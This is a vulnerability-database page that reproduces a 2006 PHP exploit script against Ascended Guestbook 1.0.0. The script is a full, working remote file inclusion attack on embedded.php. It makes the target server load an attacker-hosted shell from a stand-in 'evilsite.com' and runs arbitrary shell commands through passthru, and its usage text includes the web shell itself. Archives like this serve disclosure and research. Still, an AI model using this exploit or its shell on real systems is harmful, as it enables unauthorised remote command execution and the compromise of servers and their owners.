Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
seebugRootSSV:64166
HistoryJul 01, 2014 - 12:00 a.m.

Ascended Guestbook <= 1.0.0 (embedded.php) File Include Exploit

2014-07-0100:00:00
Root
www.seebug.org
9
JSON

No description provided by source.


                                                #!/usr/bin/php -q -d short_open_tag=on
&#60;?
print &#39;
:::::::::  :::::::::: :::     ::: ::::::::::: :::        
:+:    :+: :+:        :+:     :+:     :+:     :+:        
+:+    +:+ +:+        +:+     +:+     +:+     +:+        
+#+    +:+ +#++:++#   +#+     +:+     +#+     +#+        
+#+    +#+ +#+         +#+   +#+      +#+     +#+        
#+#    #+# #+#          #+#+#+#       #+#     #+#        
#########  ##########     ###     ########### ########## 
::::::::::: ::::::::::     :::     ::::    ::::  
    :+:     :+:          :+: :+:   +:+:+: :+:+:+ 
    +:+     +:+         +:+   +:+  +:+ +:+:+ +:+ 
    +#+     +#++:++#   +#++:++#++: +#+  +:+  +#+ 
    +#+     +#+        +#+     +#+ +#+       +#+ 
    #+#     #+#        #+#     #+# #+#       #+# 
    ###     ########## ###     ### ###       ### 
	
   - - [DEVIL TEAM THE BEST POLISH TEAM] - -
 
Ascended Guestbook &#60;= 1.0.0 (embedded.php) Remote File Include Exploit
[Script name: Ascended Guestbook 1.0.0
[Script site: http://www.ascdevel.com/pages/products/aguestbook/download.php
Find by: Kacper (a.k.a Rahim)
DEVIL TEAM IRC: 72.20.18.6:6667 #devilteam
Contact: [email protected]
or
http://www.rahim.webd.pl/
(c)od3d by Kacper
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Greetings DragonHeart and all DEVIL TEAM Patriots :)
- Leito & Leon 
TomZen, Gelo, Ramzes, DMX, Ci2u, Larry, @steriod, Drzewko, CrazzyIwan, Rammstein
Adam., Kicaj., DeathSpeed, Arkadius, Michas, pepi, nukedclx, SkD, MXZ, sysios, 
mIvus, nukedclx, SkD, wacky
&#39;;

if ($argc&#60;4) {
print (&#39;
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Usage: php &#39;.$argv[0].&#39; host shell cmd OPTIONS
host:      script server (ip/hostname)
shell:     path to shell (&#60;?passthru($_GET[cmd]);?&#62;)
cmd:       a shell command (ls -la)
Options:
 -p[port]:    specify a port other than 80
 -P[ip:port]: specify a proxy
Example:
php &#39;.$argv[0].&#39; localhost http://www.evilsite.com/shell.txt ls -la -P1.1.1.1:80
shell.txt: &#60;?php ob_clean();echo&#34;Hacker_Kacper_Made_in_Poland!!..Hauru..^_^..the..best..polish..team..Greetz&#34;;ini_set(&#34;max_execution_time&#34;,0);echo &#34;hauru&#34;;passthru($_GET[&#34;cmd&#34;]);die;?&#62;
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
&#39;);
die;
}

error_reporting(0);
ini_set(&#34;max_execution_time&#34;,0);
ini_set(&#34;default_socket_timeout&#34;,5);

function quick_dump($string)
{
  $result=&#39;&#39;;$exa=&#39;&#39;;$cont=0;
  for ($i=0; $i&#60;=strlen($string)-1; $i++)
  {
   if ((ord($string[$i]) &#60;= 32 ) | (ord($string[$i]) &#62; 126 ))
   {$result.=&#34;  .&#34;;}
   else
   {$result.=&#34;  &#34;.$string[$i];}
   if (strlen(dechex(ord($string[$i])))==2)
   {$exa.=&#34; &#34;.dechex(ord($string[$i]));}
   else
   {$exa.=&#34; 0&#34;.dechex(ord($string[$i]));}
   $cont++;if ($cont==15) {$cont=0; $result.=&#34;\r\n&#34;; $exa.=&#34;\r\n&#34;;}
  }
 return $exa.&#34;\r\n&#34;.$result;
}
$proxy_regex = &#39;(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)&#39;;
function sendpacketii($packet)
{
  global $proxy, $host, $port, $html, $proxy_regex;
  if ($proxy==&#39;&#39;) {
    $ock=fsockopen(gethostbyname($host),$port);
    if (!$ock) {
      echo &#39;No response from &#39;.$host.&#39;:&#39;.$port; die;
    }
  }
  else {
	$c = preg_match($proxy_regex,$proxy);
    if (!$c) {
      echo &#39;Not a valid proxy...&#39;;die;
    }
    $parts=explode(&#39;:&#39;,$proxy);
    echo &#34;Connecting to &#34;.$parts[0].&#34;:&#34;.$parts[1].&#34; proxy...\r\n&#34;;
    $ock=fsockopen($parts[0],$parts[1]);
    if (!$ock) {
      echo &#39;No response from proxy...&#39;;die;
	}
  }
  fputs($ock,$packet);
  if ($proxy==&#39;&#39;) {
    $html=&#39;&#39;;
    while (!feof($ock)) {
      $html.=fgets($ock);
    }
  }
  else {
    $html=&#39;&#39;;
    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
      $html.=fread($ock,1);
    }
  }
  fclose($ock);
  #debug
  #echo &#34;\r\n&#34;.$html;
}
function make_seed()
{
   list($usec, $sec) = explode(&#39; &#39;, microtime());
   return (float) $sec + ((float) $usec * 100000);
}

$host=$argv[1];
$shell=$argv[2];
$cmd=&#34;&#34;;

$port=80;
$proxy=&#34;&#34;;
for ($i=3; $i&#60;$argc; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if (($temp&#60;&#62;&#34;-p&#34;) and ($temp&#60;&#62;&#34;-P&#34;)) {$cmd.=&#34; &#34;.$argv[$i];}
if ($temp==&#34;-p&#34;)
{
  $port=str_replace(&#34;-p&#34;,&#34;&#34;,$argv[$i]);
}
if ($temp==&#34;-P&#34;)
{
  $proxy=str_replace(&#34;-P&#34;,&#34;&#34;,$argv[$i]);
}
}
if ($proxy==&#39;&#39;) {$p=&#39;http://&#39;.$host.&#39;:&#39;.$port;}

$packet =&#34;GET &#34;.$p.&#34;embedded.php?CONFIG[path]=&#34;.$shell.&#34;?cmd=&#34;.$cmd.&#34;%00 HTTP/1.0\r\n&#34;;
$packet.=&#34;Host: &#34;.$host.&#34;\r\n&#34;;
$packet.=&#34;Connection: Close\r\n\r\n&#34;;
sendpacketii($packet);
if (strstr($html,&#34;hauru&#34;))
{
$temp=explode(&#34;hauru&#34;,$html);
die($temp[1]);
}
echo &#34;Exploit err0r :(&#34;;
echo &#34;Go to DEVIL TEAM IRC: 72.20.18.6:6667 #devilteam&#34;;
?&#62;

# milw0rm.com [2006-10-24]
JSON